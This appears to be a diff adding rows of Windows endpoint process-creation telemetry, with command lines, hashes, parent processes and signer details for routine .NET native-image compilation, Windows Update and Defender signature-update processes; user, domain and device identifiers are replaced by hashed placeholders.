+97,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.134389500+00:00,10532,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.753380700+00:00,9384,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1076",True,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.199801900+00:00,2021-06-23 01:03:43.140463400+00:00,ce4ee40a-a86f-4a1f-a787-46e611a54e27,computerpii_0a470890c60768167990033d701e7bd881398861,156059,False,10.7740.19041.1052,False,11540474045172058,,11540474045172066,2021-06-23 01:00:55.753380700+00:00,9384,2021-06-23 01:00:55.753380700+00:00,ngentask.exe,9384,256,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+98,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.148073700+00:00,14252,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.313002500+00:00,2021-06-23 01:03:43.140555200+00:00,ae6b9565-9ad2-48d2-a63a-3ded34c90d46,computerpii_0a470890c60768167990033d701e7bd881398861,156060,False,10.7740.19041.1052,False,11540474045172059,,11540474045172067,2021-06-23 01:00:55.768853+00:00,13440,2021-06-23 01:00:55.768853+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,13440,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+99,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.510482100+00:00,1424,ngen.exe,"""ngen.exe"" install ""System.Runtime.WindowsRuntime, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.559822700+00:00,2021-06-23 01:03:43.140654+00:00,1c3b2ee5-b9b9-4811-a2ef-1214ec9feef1,computerpii_0a470890c60768167990033d701e7bd881398861,156061,False,10.7740.19041.1052,False,11540474045172059,,11540474045172069,2021-06-23 01:00:55.768853+00:00,13440,2021-06-23 01:00:55.768853+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,13440,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+100,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.510470700+00:00,8812,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.753380700+00:00,9384,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1076",True,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.559943+00:00,2021-06-23 01:03:43.140755200+00:00,2955c27a-154e-45e5-ac82-a199bb05306d,computerpii_0a470890c60768167990033d701e7bd881398861,156062,False,10.7740.19041.1052,False,11540474045172058,,11540474045172068,2021-06-23 01:00:55.753380700+00:00,9384,2021-06-23 01:00:55.753380700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,9384,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+101,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.539271400+00:00,6940,mscorsvw.exe,"mscorsvw.exe -StartupEvent 1d0 -InterruptEvent 0 -NGENProcess 1bc -Pipe 1cc -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.807523600+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe,151984,412a3fb0c25743da59375c1e298933ea,da1087ba2641efd77d85e5838aeb6c333e80caa9f24c889fd2de2e0b58f8d1a5,9b3f155d23569a683a1c1059d539a15a0c08093f,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:56.510482100+00:00,1424,ngen.exe,"""ngen.exe"" install ""System.Runtime.WindowsRuntime, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-23 01:00:55.768853+00:00,13440,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.566281+00:00,2021-06-23 01:03:43.140847+00:00,1bafab77-b499-4f43-99c9-e66640294341,computerpii_0a470890c60768167990033d701e7bd881398861,156063,False,10.7740.19041.1052,False,11540474045172069,,11540474045172070,2021-06-23 01:00:56.510482100+00:00,1424,2021-06-23 01:00:56.510482100+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,1424,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,174552,2020-12-02 20:58:16+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:56.153898900+00:00,2021-02-17 04:29:15.698814400+00:00,16512,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+102,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.569532400+00:00,16356,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId 3609992b-69d5-43bd-983c-255175c8312e /RunHandlerComServer",PortableExecutable,2021-04-14 01:10:16.553201900+00:00,C:\Windows\System32\wuauclt.exe,64008,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,fd33757fa1522b4555e8d8d61bd18a07,6d17958c6527346036f35c6d9db2f5c8d820cbfbd043588304c7beddf7ea8641,9a4803b5c0e1a33396a4c816dbe57369241f419c,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:48:10.634688500+00:00,13224,MoUsoCoreWorker.exe,mousocoreworker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.668137400+00:00,2021-06-23 01:03:43.141881900+00:00,ffb9d055-4e5e-40c9-b868-c8525b111efd,computerpii_0a470890c60768167990033d701e7bd881398861,156074,False,10.7740.19041.1052,False,11540474045137196,,11540474045172071,2021-06-10 00:48:10.634688500+00:00,13224,2021-06-10 00:48:10.634688500+00:00,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,13224,128,ActiveProcessStartkey,C:\Windows\System32,1553408,1990-07-31 23:15:30+00:00,2021-06-09 01:20:44.588993100+00:00,2021-06-10 00:48:10.654901200+00:00,2021-06-09 01:20:44.551541700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,MoUSO Core Worker Process,MoUSOCoreWorker.exe,MoUSO Core Worker Process,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update
+103,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.658790800+00:00,6652,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:672",True,2021-06-23 01:00:55.367532600+00:00,16324,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.694756400+00:00,2021-06-23 01:03:43.141986800+00:00,cb881070-26de-4aab-9470-80ee6445521c,computerpii_0a470890c60768167990033d701e7bd881398861,156075,False,10.7740.19041.1052,False,11540474045172059,,11540474045172072,2021-06-23 01:00:55.768853+00:00,13440,2021-06-23 01:00:55.768853+00:00,ngentask.exe,13440,256,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:55.782419200+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+104,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.661118100+00:00,13848,AM_Delta_Patch_1.341.1201.0.exe,"""AM_Delta_Patch_1.341.1201.0.exe"" WD /q",PortableExecutable,2021-06-23 01:00:56.595750700+00:00,C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1201.0.exe,1028544,2b418820d12832ceeb75d55217b4bf35,2b4f056713f521e233f1b6a0bce78419c68e001857c9eeac73981fb6672141d9,416fdab2461cb35816478476a81d2913413aca89,970600bd493cac68a5b1efe9dbb626f9,2423ce1293c1980ee7dd4543efeb48b69634dbce875c830e7f8cd87f3c6d25b4,3f5c88006e75e1fbbd8de658d1d66aeac432de75,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:56.569532400+00:00,16356,wuauclt.exe,"""wuauclt.exe"" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId 3609992b-69d5-43bd-983c-255175c8312e /RunHandlerComServer",True,2021-06-10 00:48:10.634688500+00:00,13224,\Device\HarddiskVolume3\Windows\System32\MoUsoCoreWorker.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.762591900+00:00,2021-06-23 01:03:43.142464300+00:00,1eb9ae1e-f2c3-4dc1-a039-54855751ab02,computerpii_0a470890c60768167990033d701e7bd881398861,156079,False,10.7740.19041.1052,False,11540474045172071,,11540474045172073,2021-06-23 01:00:56.569532400+00:00,16356,2021-06-23 01:00:56.569532400+00:00,\Device\HarddiskVolume3\Windows\System32\wuauclt.exe,16356,128,ActiveProcessStartkey,C:\Windows\System32,64008,1970-11-28 05:49:59+00:00,2021-04-14 01:10:16.555182500+00:00,2021-06-23 01:00:56.564477300+00:00,2021-04-14 01:10:16.553201900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,wuauclt.exe,wuauclt.exe,Windows Update,Microsoft Corporation,Microsoft Malware Protection,1.341.1257.0,AM_Delta_Patch_1.341.1201.0.exe,AM_Delta_Patch_1.341.1201.0.exe,Microsoft Antimalware WU Stub
+105,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.689713600+00:00,16488,mscorsvw.exe,"mscorsvw.exe -StartupEvent 20c -InterruptEvent 0 -NGENProcess 1fc -Pipe 208 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.864371200+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe,125872,d7365b80e8951ddc95f3a8e3ac01d37d,3e5099f573601926e59862fba2495974688e72677c73f10e4c99e26a76cdcf37,0636347981cb05b74859ce7c841753da90ce679a,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:56.510470700+00:00,8812,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-23 01:00:55.753380700+00:00,9384,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.764215700+00:00,2021-06-23 01:03:43.142555800+00:00,1ea5146e-c6be-4f69-9fc4-89f230215553,computerpii_0a470890c60768167990033d701e7bd881398861,156080,False,10.7740.19041.1052,False,11540474045172068,,11540474045172074,2021-06-23 01:00:56.510470700+00:00,8812,2021-06-23 01:00:56.510470700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,8812,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,144344,2020-12-02 21:00:07+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:56.132461200+00:00,2021-02-17 04:29:15.829464400+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+106,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.696610600+00:00,18668,MpSigStub.exe,MpSigStub.exe /stub 1.1.17800.4 /payload 1.341.1257.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1201.0.exe WD /q,PortableExecutable,2020-11-11 01:11:41.879252300+00:00,C:\Windows\System32\MpSigStub.exe,799104,5221b7a59665153028fb57761ce560b9,0bc408c801441239f72d7df3dd6edbcdfb5313d6ae5a04c0a13e8c2dfc39f6d8,d65eae951fe09f39555951970ad03737520c7b12,2b418820d12832ceeb75d55217b4bf35,2b4f056713f521e233f1b6a0bce78419c68e001857c9eeac73981fb6672141d9,416fdab2461cb35816478476a81d2913413aca89,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:56.661118100+00:00,13848,AM_Delta_Patch_1.341.1201.0.exe,"""AM_Delta_Patch_1.341.1201.0.exe"" WD /q",True,2021-06-23 01:00:56.569532400+00:00,16356,\Device\HarddiskVolume3\Windows\System32\wuauclt.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.765149200+00:00,2021-06-23 01:03:43.142651700+00:00,86625888-7ef1-427b-912e-55c2d6c05170,computerpii_0a470890c60768167990033d701e7bd881398861,156081,False,10.7740.19041.1052,False,11540474045172073,,11540474045172075,2021-06-23 01:00:56.661118100+00:00,13848,2021-06-23 01:00:56.661118100+00:00,\Device\HarddiskVolume3\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.341.1201.0.exe,13848,128,ActiveProcessStartkey,C:\Windows\SoftwareDistribution\Download\Install,1028544,2021-06-22 19:25:37+00:00,2021-06-23 00:54:05.623606500+00:00,2021-06-23 01:00:56.698549400+00:00,2021-06-23 01:00:56.595750700+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Malware Protection,1.341.1257.0,AM_Delta_Patch_1.341.1201.0.exe,AM_Delta_Patch_1.341.1201.0.exe,Microsoft Antimalware WU Stub,Microsoft Corporation,Microsoft Malware Protection,1.1.17800.4,MpSigStub.exe,MpSigStub.exe,Microsoft Malware Protection Signature Update Stub
+107,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:56.814583400+00:00,12500,mscorsvw.exe,"mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 0 -NGENProcess 1c4 -Pipe 1d0 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.807523600+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe,151984,412a3fb0c25743da59375c1e298933ea,da1087ba2641efd77d85e5838aeb6c333e80caa9f24c889fd2de2e0b58f8d1a5,9b3f155d23569a683a1c1059d539a15a0c08093f,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:56.658790800+00:00,6652,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-23 01:00:55.768853+00:00,13440,ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.926527200+00:00,2021-06-23 01:03:43.206903600+00:00,60463b4d-27a4-4e96-a1c7-733df30d7845,computerpii_0a470890c60768167990033d701e7bd881398861,156088,False,10.7740.19041.1052,False,11540474045172072,,11540474045172076,2021-06-23 01:00:56.658790800+00:00,6652,2021-06-23 01:00:56.658790800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,6652,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,174552,2020-12-02 20:58:16+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-23 01:00:56.649097500+00:00,2021-02-17 04:29:15.698814400+00:00,2304,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+108,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:56.910313600+00:00,6852,ngentask.exe,"""NGenTask.exe"" /StopEvent:1332",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.753380700+00:00,9384,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:1076",True,2021-06-23 01:00:55.367532600+00:00,16324,taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:56.930338300+00:00,2021-06-23 01:03:43.206980500+00:00,5c5edb20-dd12-4c37-bcd9-77ebbd685ab9,computerpii_0a470890c60768167990033d701e7bd881398861,156089,False,10.7740.19041.1052,False,11540474045172058,,11540474045172077,2021-06-23 01:00:55.753380700+00:00,9384,2021-06-23 01:00:55.753380700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,9384,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-23 01:00:55.752251+00:00,2021-02-17 04:29:20.532877500+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
